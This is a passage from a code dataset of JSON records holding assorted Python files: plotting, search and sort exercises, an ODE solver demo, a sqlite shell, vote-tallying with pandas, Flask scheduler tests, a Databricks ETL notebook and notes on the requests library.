2\nevaluate(x, ps, 2)\n\nax = pylab.gca()\nbox = ax.get_position()\nax.set_position([box.x0, box.y0 + box.height * 0.3,\n                 box.width, box.height * 0.7])\n\nhandles, labels = pylab.gca().get_legend_handles_labels()\nnewLabels, newHandles = [], []\nfor handle, label in zip(handles, labels):\n    if label not in newLabels:\n        newLabels.append(label)\n        newHandles.append(handle)\n\nnewLabels[-2:] = newLabels[:-3:-1]\nnewHandles[-2:] = newHandles[:-3:-1]\npylab.legend(newHandles, newLabels, loc='upper center', bbox_to_anchor=(0.5, -0.15),\n             fancybox=True, shadow=False, ncol=1)\npylab.title(\"Lower bound instance: $d = 2$\")\npylab.xlim(-1, 1)\npylab.ylim(0, 3)\npylab.savefig(\"lowerbound.pdf\")\n","sub_path":"plot_lowerbound.py","file_name":"plot_lowerbound.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"83044942","text":"# Binary search: find a key value in a sorted list\n## Inputs: a list and a key\n\ndef BinarySearch(list, key):\n    left = 0\n    right = len(list) - 1\n\n    while(left <= right):\n        middle = int((left + right) / 2)\n\n        if key < list[middle]:\n            right = middle - 1\n        elif key > list[middle]:\n            left = middle + 1\n        elif key == list[middle]:\n            return middle\n\n    return -1\n\ndef SelectionSort(a, n):\n    for i in range(n):\n        for j in range(i, n):\n            if a[i] > a[j]:\n                temp = a[i]\n                a[i] = a[j]\n                a[j] = temp\n    return a\n\nn = int(input('Array size: '))\nlist = list()\nfor i 
in range(n):\n    list.append(int(input()))\nkey = int(input('Key to search for: '))\n\nlist = SelectionSort(list, n) # sort\n\nprint(BinarySearch(list, key))","sub_path":"dataStructure/No1/BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"647559278","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nProblem 7-a : Python code for solving initial value problems using scipy.integrate.solve_ivp. Also find\nthe analytical solution of the problem using Mathematica and plot it.\nCreated on Wed Apr 1 19:00:20 2020\n\n@author: krishnendu\n\"\"\"\n\nimport numpy as np\nfrom scipy.integrate import *\nimport matplotlib.pyplot as plt\ndef fun1(t,y): ##defining the function for derivative \n    return t*np.exp(3*t)-2*y\nt=np.linspace(0,1,1000) #creating mesh points\ns=solve_ivp(fun1,[0,1],[0],dense_output=True) #solving the problem using solve_ivp \nplt.plot(t,s.sol(t).T,label='using solve_ivp') #plotting the solution using solve_ivp\nplt.plot(t,(1/25)*(np.exp(-2*t)-np.exp(3*t))+(1/5)*np.exp(3*t)*t,label='analytical') #plotting the analytical solution\nplt.legend()\nplt.xlabel(\"t\",size=18)\nplt.ylabel(\"y\",size=18)\nplt.title(\"Problem 7-a\",size=18)\nplt.grid()\nplt.show()\n\n\n","sub_path":"problem_7-a_assign_2.py","file_name":"problem_7-a_assign_2.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"95106154","text":"#sqlite3 interface code using python\nimport sqlite3\nconnection = sqlite3.connect(\"sample.db\")\ncursor = connection.cursor()\nprompt = \"sqlite3>\"\n\nwhile True:\n\tprint(prompt, end = \" \")\n\tquery = input(\"\")\n\tif query.lower() == '.quit':\n\t\texit()\n\telif query.lower() == '.tables':\n\t\ttableList = cursor.execute(\"SELECT name FROM sqlite_master WHERE type = 'table'\")\n\t\tfor tables in tableList:\n\t\t\tprint(tables[0], end = \" \")\n\n\t\tcontinue  # nothing to execute for '.tables'; skipping avoids a spurious error print below\n\n\telse:\n\t\twhile query[-1] != \";\":\n\t\t\tquery = query + input(\" -->\")\n\n\ttry:\n\t\tcursor.execute(query) #executes query \n\n\t\tconnection.commit() #commits with database.\n\t\t#to print the result\n\t\toutput = cursor.fetchall()\n\t\tfor data in output:\n\t\t\tprint(\"\")\n\t\t\tfor item in data:\n\t\t\t\tprint(item, end = \"|\")\n\t\tprint(\" \")\n\texcept Exception as e:\n\t\tprint(e)\n\t\tpass\n","sub_path":"sqlite3Interface.py","file_name":"sqlite3Interface.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
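# A minimal cross-check of BinarySearch above against the stdlib bisect module,
# which performs the same halving search on sorted input; the sample list is
# hypothetical, not part of the original file.
import bisect

data = [1, 3, 5, 7, 9]
i = bisect.bisect_left(data, 7)
assert i < len(data) and data[i] == 7    # key found at index 3
assert bisect.bisect_left(data, 4) == 2  # insertion point when the key is absent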
+{"seq_id":"137497721","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n#Open File with Voting\r\ndf = pd.read_csv('votes.csv')\r\ndf = df.drop([\"id\", \"uploaded_on\", \"status\"], axis = 1)\r\n\r\n#Open File with Pic Data\r\ndf_img = pd.read_csv('images.csv')\r\ndf_img.username = df_img.username.str.replace(\"https://www.zroadster.com/forum/members/\", '').str.split('.').str[0]\r\ndf_img = df_img.drop([\"size\", \"votes\", \"uploaded_on\", \"status\", \"id\", \"random_ID\"], axis = 1)\r\n\r\n#New DF for Output\r\ndf_final = pd.DataFrame(columns=[\"file_name\", \"random_ID_voter\"])\r\n\r\n#Unserialize PHP and append it to DF\r\nfor index, row in df.iterrows():\r\n    vote_list = row[\"votes\"].split('\"')[1:][::2]\r\n    user_id = row[\"random_ID\"]\r\n    for e in vote_list:\r\n        df_new = pd.DataFrame([[e, user_id]], columns=[\"file_name\", \"random_ID_voter\"])\r\n        df_final = df_final.append(df_new)\r\n\r\n#Merge Pic Information to Votes\r\ndf_final = df_final.merge(df_img, on = \"file_name\", how=\"left\")\r\ndf_final = df_final.reset_index(drop=True)\r\n\r\n#Get Image Name and Num Votes\r\nranking = pd.DataFrame()\r\nranking[\"file_name\"] = df_final.file_name.value_counts().index\r\nranking[\"votes\"] = df_final.file_name.value_counts().values\r\n\r\n#Merge Username to Image\r\nranking = ranking.merge(df_img, on = \"file_name\", how=\"left\")\r\n\r\n#Just One Picture per Username\r\nuser_list = ranking.username.unique().tolist()\r\nbest_user = pd.DataFrame(columns=[\"file_name\", \"votes\", \"username\"])\r\n\r\nfor u in user_list:\r\n    user_stats = ranking[ranking.username == u]\r\n    user_stats = user_stats.reset_index(drop = True)\r\n    \r\n    if (len(user_stats) > 2):\r\n        if user_stats.votes[0] != user_stats.votes[1]:\r\n            best_user = best_user.append(ranking[ranking.username == u][:1])\r\n        elif user_stats.votes[1] != user_stats.votes[2]:\r\n            best_user = best_user.append(ranking[ranking.username == u][:2])\r\n        else:\r\n            best_user = best_user.append(ranking[ranking.username == u][:])\r\n    \r\n    elif len(user_stats) > 1:\r\n        if user_stats.votes[0] != user_stats.votes[1]:\r\n            best_user = best_user.append(ranking[ranking.username == u][:1])\r\n        else:\r\n            best_user = best_user.append(ranking[ranking.username == u][:])\r\n    \r\n    else:\r\n        best_user = best_user.append(ranking[ranking.username == u][:])\r\n    \r\n    \r\nbest_user = best_user.reset_index(drop = True)\r\n\r\n#Statistics\r\nprint('Number of submitted images:', len(df_img))\r\nprint('Number of images that received votes:', len(df_final.file_name.unique()))\r\nprint('Number of users who voted:', len(df_final.random_ID_voter.unique()))\r\nprint('Number of votes:', len(df_final.file_name))\r\nprint('Votes per user:', round(len(df_final.file_name) / len(df_final.random_ID_voter.unique()),2))\r\nprint(120*\"-\")\r\n\r\n#Best 12 Pictures\r\nprint('The 12 photos with the most votes:')\r\nprint(ranking[:12])\r\nprint(120*\"-\")\r\n\r\n#Best 12 Pictures (If User Twice in List Show More Pictures)\r\ncounter = 12\r\nbul = best_user.username[:counter].tolist()\r\nfor e in list(set(bul)):\r\n    if bul.count(e) > 1:\r\n        counter += 1\r\n    \r\nprint('The', counter, 'photos with the most votes (1 photo/user):')\r\nprint(best_user[:counter])\r\nprint(120*\"-\")\r\n\r\n\r\n#List of All Votes\r\nwith pd.option_context('display.max_rows', None, 'display.max_columns', None):\r\n    print(df_final.drop('username', axis=1))","sub_path":"auswertung.py","file_name":"auswertung.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"479840099","text":"\"\"\"View definitions for the home app.\"\"\"\n\nfrom django.shortcuts import redirect\n\n\ndef reference_redirect(request):\n    \"\"\"Functional view that accepts any request starting with a reference namespace.\"\"\"\n    base_url = \"http://reference.iatistandard.org\"\n    slug = request.get_full_path()\n    redirection_url = base_url + slug\n    return redirect(to=redirection_url, permanent=True)\n","sub_path":"iati/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"484612612","text":"# Vingle Team Lunch v0.4.1\n\nimport random\n\n#people data\npeople = [[\"TAEMOON\", \"ENG\"],[\"DONGSOO\", 
\"ENG\"],[\"JUYEOUNG\", \"ENG\"],[\"WONSIK\", \"ENG\"],[\"KURT\", \"ENG\"],[\"JIHYE\", \"ENG\"],[\"CHARLIE\", \"ENG\"],[\"RACHEL\", \"PRO\"],[\"JUSTIN\", \"PRO\"],[\"SUYEONG\", \"PRO\"],[\"TAEO\", \"PRO\"],[\"JOSHUA\", \"PRO\"],[\"JONATHAN\", \"MAR\"],[\"SURYEON\", \"MAR\"],[\"SEYOUNG\", \"MAR\"],[\"SOYUN\", \"MAR\"],[\"HYOJIN\", \"MAR\"],[\"HENRY\", \"MAR\"],[\"SANGHOON\", \"MAR\"],[\"JEONGWON\", \"MAR\"],[\"ELIZABETH\", \"MAR\"],[\"CAROL\", \"MAR\"], [\"JOE\", \"PRO\"]]\n\n\nvolume = 4\ninput_string = \"Who will not eat lunch? (input a number) : \"\n\n#print people\ncount = 0\nfor person in people:\n print(str(count) + \" : \" + str(person[0]))\n count += 1\n\n\nexceptionlist = []\nnumber = raw_input(input_string)\n\nwhile number != '':\n\tif int(number) < len(people):\n\t\tperson = people[int(number)]\n\t\tname = person[0]\n\t\tprint (name)\n\t\texceptionlist.append(name)\n\tnumber = raw_input(input_string)\n\nprint(\"\\n\\nThis members are excepted : %s\" % str(exceptionlist))\n\nlunchMember = []\n\n\nfor person in people:\n if (person[0] in exceptionlist) == False:\n lunchMember.append(person)\n\n\nteamcount = int(len(lunchMember)/volume)\n\n\nteams = []\n\nfor index in range(teamcount): # [0,1,2,3]\n teams.append([])\n\nprint(\"\\nteam count : %s\\nlunch member count : %s\\n\" % (str(teamcount), len(lunchMember)))\n\nrandom.shuffle(lunchMember)\n\neng = []\npro = []\nmar = []\n\nfor person in lunchMember:\n if person[1] == \"ENG\":\n eng.append(person)\n elif person[1] == \"PRO\":\n pro.append(person)\n else:\n mar.append(person)\n\ncount = 0\nfor person in eng:\n team = teams[count%teamcount]\n team.append(person[0])\n count += 1\n \nfor person in pro:\n team = teams[count%teamcount]\n team.append(person[0]) \n count += 1 \n\nfor person in mar:\n team = teams[count%teamcount]\n team.append(person[0])\n count += 1\n\n\nfor team in teams:\n\tprint(team)\nprint(\"\\n\\n\")\n","sub_path":"vinglelunch.py","file_name":"vinglelunch.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"139174466","text":"import abc\n\nfrom torch.utils import data\nfrom .runtime_transformations import GenericSequenceRuntimeDatasetTransformer\n\n\nclass InstanceDatasetBase(data.Dataset):\n __metaclass__ = abc.ABC\n\n @property\n @abc.abstractmethod\n def semantic_class_names(self):\n pass\n\n # __getitem__(self, index) enforced by data.Dataset\n # __len__(self) enforced by data.Dataset\n\n\nclass TransformedInstanceDataset(InstanceDatasetBase):\n __metaclass__ = data.Dataset\n\n def __init__(self, raw_dataset, raw_dataset_returns_images=False, precomputed_file_transformation=None,\n runtime_transformation=None):\n \"\"\"\n :param raw_dataset_returns_images: Set to false for standard datasets that load from files; set to true for\n synthetic datasets that directly return images and labels.\n \"\"\"\n\n if raw_dataset_returns_images:\n assert precomputed_file_transformation is None, 'Cannot do precomputed file transformation on datasets ' \\\n 'of type \\'images\\' (generated on the fly).'\n self.raw_dataset_returns_images = raw_dataset_returns_images\n self.raw_dataset = raw_dataset\n self.precomputed_file_transformation = precomputed_file_transformation\n self.runtime_transformation = runtime_transformation\n self.should_use_precompute_transform = True\n self.should_use_runtime_transform = True\n\n def __len__(self): # explicit\n return len(self.raw_dataset)\n\n def __getitem__(self, index):\n 
precomputed_file_transformation = self.precomputed_file_transformation if \\\n self.should_use_precompute_transform else None\n runtime_transformation = self.runtime_transformation if \\\n self.should_use_runtime_transform else None\n img, lbl = self.get_item(index,\n precomputed_file_transformation=precomputed_file_transformation,\n runtime_transformation=runtime_transformation)\n return img, lbl\n\n @property\n def semantic_class_names(self):\n return self.get_semantic_class_names()\n\n @property\n def n_semantic_classes(self):\n return len(self.semantic_class_names)\n\n def get_semantic_class_names(self):\n \"\"\"\n If we changed the semantic subset, we have to account for that change in the semantic class name list.\n \"\"\"\n if self.should_use_runtime_transform and self.runtime_transformation is not None:\n transformation_list = self.runtime_transformation.transformer_sequence if isinstance(\n self.runtime_transformation, GenericSequenceRuntimeDatasetTransformer) else \\\n [self.runtime_transformation]\n semantic_class_names = self.raw_dataset.semantic_class_names\n for transformer in transformation_list:\n if hasattr(transformer, 'transform_semantic_class_names'):\n semantic_class_names = transformer.transform_semantic_class_names(\n semantic_class_names)\n return semantic_class_names\n else:\n return self.raw_dataset.semantic_class_names\n\n def load_files(self, img_file, sem_lbl_file, inst_lbl_file):\n # often self.raw_dataset.load_files(?)\n raise NotImplementedError\n\n def get_item_from_files(self, index, precomputed_file_transformation=None):\n data_file = self.raw_dataset.files[index] # files populated when raw_dataset was instantiated\n img_file, sem_lbl_file, inst_lbl_file = data_file['img'], data_file['sem_lbl'], data_file['inst_lbl']\n\n # Get the right file\n if precomputed_file_transformation is not None:\n img_file, sem_lbl_file, inst_lbl_file = \\\n precomputed_file_transformation.transform(img_file=img_file, sem_lbl_file=sem_lbl_file,\n inst_lbl_file=inst_lbl_file)\n\n # Run data through transformation\n img, lbl = self.load_files(img_file, sem_lbl_file, inst_lbl_file)\n return img, lbl\n\n def get_item(self, index, precomputed_file_transformation=None, runtime_transformation=None):\n if not self.raw_dataset_returns_images:\n img, lbl = self.get_item_from_files(index, precomputed_file_transformation)\n else:\n img, lbl = self.raw_dataset.__getitem__(index)\n assert precomputed_file_transformation is None, 'Cannot do precomputed file transformation on datasets ' \\\n 'of type \\'images\\' (generated on the fly).'\n if runtime_transformation is not None:\n img, lbl = runtime_transformation.transform(img, lbl)\n\n return img, lbl\n","sub_path":"instanceseg/datasets/instance_dataset.py","file_name":"instance_dataset.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"549824954","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ### Fact Supply Plan Planning\n# MAGIC \n# MAGIC Takes LGTY_PRDTN_PLN_RPT and creates a CSC table from it. 
This only runs after the 4pm daily run of LGTY_PRDTN_PLN_RPT.\n# MAGIC \n# MAGIC | Date | Author | Work Item | Notes |\n# MAGIC |------|--------|-----------|-------|\n# MAGIC | 2020-10-01 | Sukanya De | OMNI-143889 | Initial notebook based on mapping |\n# MAGIC | 2020-10-27 | Matt Kleiman | OMNI-143889 | Formatting changes |\n# MAGIC | 2020-10-27 | Matt Kleiman | OMNI-161335 | Mapping changes -- now hits snapshot table |\n# MAGIC | 2020-02-18 | Matt Kleiman | OMNI-160993 | Mapping changes -- now hits lgty_prdtn_ppd_snpst table to fix issues with Material Number |\n\n# COMMAND ----------\n\n# DBTITLE 1,Initialization\nfrom pyspark.sql.functions import col, lit, current_timestamp, expr, when\nfrom pyspark.sql.types import IntegerType\nfrom datetime import date, datetime\n\n# Parameters\ndbutils.widgets.text('initFlg', '', '')\ndbutils.widgets.text(\"schmNm\", \"\", \"\")\ndbutils.widgets.text(\"tblNm\", \"\", \"\")\n\n# Base variables\nschema_name = dbutils.widgets.get(\"schmNm\").lower()\ntable_name = dbutils.widgets.get(\"tblNm\").lower()\nschema_table_name = f'{schema_name}.{table_name}'\n\ntable_exists = table_name in sqlContext.tableNames(schema_name)\noverwrite = dbutils.widgets.get('initFlg') == 'X'\n\n# COMMAND ----------\n\n# MAGIC %run\n# MAGIC /Users/svceimdbrx@columbia.com/edw_admin/shared_functions\n\n# COMMAND ----------\n\n# DBTITLE 1,Prepare Dataset\nsource_table = 'ENTPR_PLANNING.LGTY_PRDTN_PPD_SNPST'\n\n# Configuration\npk_list = [\n  'SnapshotDate',\n  'Iteration',\n  'MaterialNumber',\n  'RegionCode',\n  'ReplenishmentFlag',\n  'Channel',\n  'SubChannel',\n  'SeasonCode'\n]\n\nmetrics_list = [\n  'SupplyPlanQuantity'\n]\n\nsurrogate_key_list = [\n  'DimRegionKey',\n  'DimChannelPlanningKey',\n  'DimSubChannelPlanningKey',\n  'DimSeasonKey',\n  'DimProductPlanningKey',\n  'DimProductChannelPlanningKey',\n  'DimProductSubChannelPlanningKey',\n  'DimProductSubChannelSeasonPlanningKey',\n  'DimFulfillmentSubChannelPlanningKey',\n  'DimStandardCostKey',\n  'DimCurrencySeasonalKey' \n]\n\nfact_columns = pk_list + metrics_list + surrogate_key_list\n\n# Create dataframe\nfact_df = (spark.table(source_table)\n           .filter(\"SPLY_TYP_CD in ('FIRM', 'PLND')\")\n\t\t   .filter(f\"SNPST_DT = (select max(snpst_dt) from {source_table} where ITER != 1)\")\n\t\t   .withColumn('SnapshotDate', col('SNPST_DT'))\n\t\t   .withColumn('Iteration', col('ITER'))\n           .withColumn('MaterialNumber', col('MTRL_NBR'))\n           .withColumn('RegionCode', when(col('RGN_CD') == 'USAR', lit('USA')).otherwise(col('RGN_CD')))\n           .withColumn('ReplenishmentFlag', when(col('RGN_CD') == 'USAR', lit('Y')).otherwise(lit('N')))\n           .withColumn('Channel', lit('Undesignated'))\n           .withColumn('SubChannel', lit('Undesignated'))    \n           .withColumn('SeasonCode', col('SEAS_CD'))\n           .withColumnRenamed('SPLY_PLN_UNITS', 'SupplyPlanQuantity')\n           .groupBy(*pk_list)\n           .agg({col: 'sum' for col in metrics_list})\n           .withColumn('SupplyPlanQuantity', col('sum(SupplyPlanQuantity)').cast('decimal(19,8)'))\n           .add_surrogate_keys(surrogate_key_list)\n           .select(*fact_columns)\n           .add_edw_fields()\n          )\n\n# COMMAND ----------\n\n# DBTITLE 1,Update Databricks Table\narg_dict = {'name': schema_table_name, 'format': 'delta', 'mode': 'overwrite'}\n\nif overwrite or not table_exists:\n  arg_dict['mergeSchema'] = 'true'\n  spark.sql(f'drop table if exists {schema_table_name}')\n  dbutils.fs.rm(f'/mnt/entadls/published/eim/managed/{schema_name}/{table_name}', True)\n  print('Overwriting...')\nelse:\n  fact_df = update_table(fact_df, schema_table_name, pk_list, set_inactives=True)\n  
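# update_table is a shared helper pulled in by the %run cell above; judging by\n  # the name, set_inactives=True flags rows missing from the new extract as\n  # inactive rather than deleting them (assumption, the helper is not shown here).\n  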
print('Updating')\n\nprint(f'New records: {fact_df.count()}')\nfact_df.write.saveAsTable(**arg_dict)\n\n# COMMAND ----------\n\n# DBTITLE 1,Write to ADW\nfact_df.filter(f\"EDW_UPDT_TS >= '{date.today()}'\").createOrReplaceGlobalTempView(table_name)\n\ndbutils.notebook.run('/Users/svceimdbrx@columbia.com/edw_admin/adw_integration_write', 120000, {'schemaNm': f'{schema_name.upper()}_LND', 'tableNm': table_name, 'dbrxTable': table_name, 'writeMode': 'overwrite'})\n\nspark.sql(f'drop view global_temp.{table_name}')\n","sub_path":"Prod/csc/fact_supply_plan_planning.py","file_name":"fact_supply_plan_planning.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"551318750","text":"from flask import Flask\nfrom flask_production import TaskScheduler\nfrom flask_production.plugins import TaskMonitor\n\nimport time\nimport json\nimport pytest\n\nMONITOR_NAME = \"Web Test\"\n\napp = Flask(__name__)\nsched = TaskScheduler()\nmonitor = TaskMonitor(app, sched=sched, display_name=MONITOR_NAME)\n\ntoggle = False\n\n@app.route(\"/\", methods=['GET'])\ndef main():\n\treturn 'Main dummy page'\n\n\ndef wash_car():\n\t\"\"\"\n\tThis is a dummy job that is scheduled to wash my car\n\tNote: objects in the mirror are closer than they appear\n\t\"\"\"\n\tglobal toggle\n\ttoggle = not toggle\n\tif toggle:\n\t\tcount = 50\n\t\twhile count > 0:\n\t\t\ttime.sleep(0.1)\n\t\t\tprint(\"washing..\\n\")\n\t\t\tcount -= 1\n\t\tprint(\"The car was washed\")\n\telse:\n\t\ttime.sleep(1)\n\t\traise Exception(\"car wash failed!\")\n\ndef another_task():\n\tprint(\"another_task\")\n\n\n@pytest.fixture\ndef client():\n\twith app.test_client() as c:\n\t\tyield c\n\n\ndef test_webservice(client):\n\tassert(client.get(\"/\").status_code==200)\n\ndef test_blankpage(client):\n\thomepage = client.get(\"/{}\".format(monitor._endpoint))\n\tassert(homepage.status_code==200)\n\tassert(homepage.data.decode().lower()=='nothing here')\n\n\ndef test_monitor_homepage(client):\n\tsched.every(\"day\").at(\"8:00\").do(another_task)\n\tsched.every(20).do(wash_car, do_parallel=True)\n\tsched.every(30).do(lambda: wash_car(), do_parallel=True)\n\t# CherryFlask(app, sched).run() # unused\n\n\thomepage = client.get(\"/{}\".format(monitor._endpoint))\n\tassert(homepage.status_code==200)\n\thtml_text = homepage.data.decode(errors='ignore').lower()\n\tassert(\"lambda\" in html_text)\n\tassert(\"wash_car\" in html_text)\n\tassert(\"another_task\" in html_text)\n\n\ndef test_monitor_jobpage(client):\n\tjobpage = client.get(\"/{}/0\".format(monitor._endpoint))\n\tassert(jobpage.status_code==200)\n\thtml_text = jobpage.data.decode(errors='ignore').lower()\n\tassert(\"another_task\" in html_text)\n\tassert(\"lambda\" not in html_text)\n\tassert(\"logs\" in html_text)\n\tassert(\"next run in\" in html_text)\n\n\ndef test_monitor_rerun_btn(client):\n\tsched.every(30).do(another_task, do_parallel=True)\n\tres = client.post(\"/{}/rerun\".format(monitor._endpoint), json={'jobid':0})\n\tassert(res.status_code==200)\n\tassert(\"success\" in res.data.decode(errors='ignore').lower())\n\n\ndef test_monitor_all_json(client):\n\tsched.every(\"day\").at(\"8:00\").do(another_task)\n\n\tresp = client.get(\"/{}/json/all\".format(monitor._endpoint), content_type='application/json')\n\trespdict = json.loads(resp.data.decode('utf8'))\n\tassert('success' in respdict)\n\tassert(isinstance(respdict['success'], list))\n\tassert(isinstance(respdict['success'][0], 
dict))\n\tassert(isinstance(respdict['success'][0]['logs'], dict))\n\n\ndef test_monitor_one_json(client):\n\tsched.every(\"day\").at(\"8:00\").do(another_task)\n\n\tresp = client.get(\"/{}/json/0\".format(monitor._endpoint), content_type='application/json')\n\trespdict = json.loads(resp.data.decode('utf8'))\n\tassert('success' in respdict)\n\tassert(isinstance(respdict['success'], dict))\n\tassert(respdict['success']['jobid']==0)\n\n\ndef test_monitor_summary(client):\n\tsched.every(\"day\").at(\"8:00\").do(another_task)\n\n\tall_resp = client.get(\"/{}/json/all\".format(monitor._endpoint), content_type='application/json')\n\tall_respdict = json.loads(all_resp.data.decode('utf8'))\n\n\tresp = client.get(\"/{}/json/summary\".format(monitor._endpoint), content_type='application/json')\n\trespdict = json.loads(resp.data.decode('utf8'))\n\tassert('success' in respdict)\n\tassert(respdict['success']['name']==MONITOR_NAME)\n\tassert(respdict['success']['summary']['count']==len(respdict['success']['details']))\n\tassert(respdict['success']['summary']['errors']==0)\n\n\tassert(len(all_respdict['success'])==len(respdict['success']['details']))\n","sub_path":"tests/test_plugins.py","file_name":"test_plugins.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"311192058","text":"\"\"\"Utility functions for reading from and writing to JSON, CSV, and other file types.\"\"\"\n\nimport csv\nimport json\nimport os\nfrom typing import Any\nfrom typing import List\nfrom typing import Union\n\n\ndef open_csv(csv_file: str, dict_reader: bool = False, delimiter: str = ',') -> List:\n    \"\"\"Delimiter can also be a pipe (|)\"\"\"\n    with open(csv_file, 'r') as file:\n        if dict_reader:\n            reader = csv.DictReader(file, delimiter=delimiter)\n        else:\n            reader = csv.reader(file, delimiter=delimiter)\n        return list(reader)\n\n\ndef write_csv(csv_file: str, rows: List[Any], has_header: bool = True) -> None:\n    with open(csv_file, 'w') as file:\n        csv_writer = csv.writer(file)\n        if has_header:\n            csv_writer.writerow(rows[0])\n            rows.pop(0)\n        csv_writer.writerows(rows)\n\n\ndef open_text(text_file: str):\n    with open(text_file, 'r') as file:\n        return file.readlines()\n\n\ndef get_file_size(path: str) -> Union[int, None]:\n    try:\n        return os.path.getsize(path)\n    except os.error as e:\n        print(\"util.file_handler got the following error: {}\".format(e))\n        return None\n\n\ndef open_json(json_file: str) -> dict:\n    with open(json_file) as file:\n        return json.load(file)\n\n\ndef write_json(json_file: str, json_dict: dict) -> None:\n    with open(json_file, 'w') as file:\n        json.dump(json_dict, file)\n","sub_path":"utils/file_helper.py","file_name":"file_helper.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"193375999","text":"# put your code here.\n\nimport string\nimport sys\nimport collections\n\ndef find_word_count(input_file):\n    \"\"\"Reads a file and counts the number of times each word appears\n\n    Removes punctuation and capitalization\n\n    \"\"\"\n    # file = open(input_file)\n    # words_dict = {}\n\n    # for line in file:\n    #     line_words = line.split()\n    #     # line_words = line.split(\" \")\n    #     for word in line_words:\n    #         word = word.lower()\n    #         for c in word:\n    #             if c in string.punctuation:\n    #                 word= word.strip(c)\n    #         words_dict[word] = words_dict.get(word, 0) + 1\n\n    # for word, count in words_dict.items():\n    #     print(\"{} {}\".format(word, count))\n\n    
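# Active approach: read the file once, lowercase it, strip punctuation, then\n    # let collections.Counter do the tallying.\n    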
file_string = open(input_file).read()\n    text = file_string.lower()\n\n    # Remove every punctuation character from the text\n    for c in string.punctuation:\n        text = text.replace(c, \"\")\n\n    words = text.split()\n\n    for word, count in collections.Counter(words).items():\n        print(\"{} {}\".format(word, count))\n\n\nfind_word_count(sys.argv[1])\n\n","sub_path":"wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"638818977","text":"'''\r\n@Author: MaoZi_Sakura\r\n@Contact: zhang132412sakura@outlook.com\r\n'''\r\n\r\n\r\n'''\r\nrequests.get(url, params)\r\nurl: the URL of the page to fetch\r\nparams: extra parameters appended to the URL, dict or byte-stream format, optional\r\nBuilds a Request object asking the server for a resource and returns a Response object containing that resource\r\n\r\nResponse object:\r\nResponse.status_code: HTTP status code, 200 means success, 404 etc. mean failure\r\nResponse.text: the response body as a string, i.e. the page content for the URL\r\nResponse.encoding: encoding guessed from the HTTP header; if none can be obtained, the default is ISO-8859-1\r\nResponse.apparent_encoding: encoding inferred from the response content itself (fallback encoding)\r\nResponse.content: the response body in binary form\r\n\r\nrequests exceptions:\r\nrequests.ConnectionError: network connection error, e.g. DNS lookup failure, connection refused\r\nrequests.HTTPError: HTTP error\r\nrequests.URLRequired: missing URL\r\nrequests.TooManyRedirects: maximum number of redirects exceeded\r\nrequests.ConnectTimeout: timed out while connecting to the remote server\r\nrequests.Timeout: the request timed out\r\n\r\nResponse.raise_for_status(): checks whether the status is 200 and raises requests.HTTPError if it is not\r\n\r\nMain methods of the requests library\r\nrequests.request(): builds a request; the base method behind each of the methods below\r\nrequests.get(): main method for fetching an HTML page, maps to HTTP GET\r\nHTTP GET: request the resource at the URL\r\nrequests.head(): fetches the headers of an HTML page, maps to HTTP HEAD\r\nHTTP HEAD: request only the response headers of the resource at the URL\r\nrequests.post(): submits a POST request to an HTML page, maps to HTTP POST\r\nHTTP POST: append new data to the resource at the URL\r\nrequests.put(): submits a PUT request to an HTML page, maps to HTTP PUT\r\nHTTP PUT: store a resource at the URL, overwriting what was there\r\nrequests.patch(): submits a partial-modification request to an HTML page, maps to HTTP PATCH\r\nHTTP PATCH: partially update the resource at the URL, i.e. change part of its content\r\nrequests.delete(): submits a delete request to an HTML page, maps to HTTP DELETE\r\nHTTP DELETE: delete the resource stored at the URL\r\n\r\nrequests.request(method, url, **kwargs)\r\n**kwargs: parameters controlling the request, all optional\r\nparams: dict or byte sequence, appended to the URL as query parameters\r\ndata: dict, byte sequence or file object, used as the body of the Request\r\njson: data in JSON format, used as the body of the Request\r\nheaders: dict of custom HTTP headers\r\ncookies: dict or CookieJar, the cookies of the Request\r\nauth: tuple, enables HTTP authentication\r\nfiles: dict, for transferring files\r\ntimeout: timeout in seconds\r\nproxies: dict, sets proxy servers for access, may include login credentials\r\nallow_redirects: True/False, default True, redirect switch\r\nstream: True/False, default True, switch for downloading the content immediately\r\nverify: True/False, default True, switch for SSL certificate verification\r\ncert: path to a local SSL certificate\r\n'''\r\n\r\n\r\nimport os\r\nimport requests\r\n\r\n\r\ndef get_url(url):\r\n    try:\r\n        headers_kv = {'user-agent': 'Mozilla/5.0'}\r\n        params_kv = {'ip': '202.204.80.112'}\r\n        r = requests.get(url, headers=headers_kv, params=params_kv)\r\n        r.raise_for_status()  # raise requests.HTTPError for non-200 responses\r\n        r.encoding = r.apparent_encoding\r\n    except requests.RequestException:\r\n        return \"Error\"\r\n    else:\r\n        return 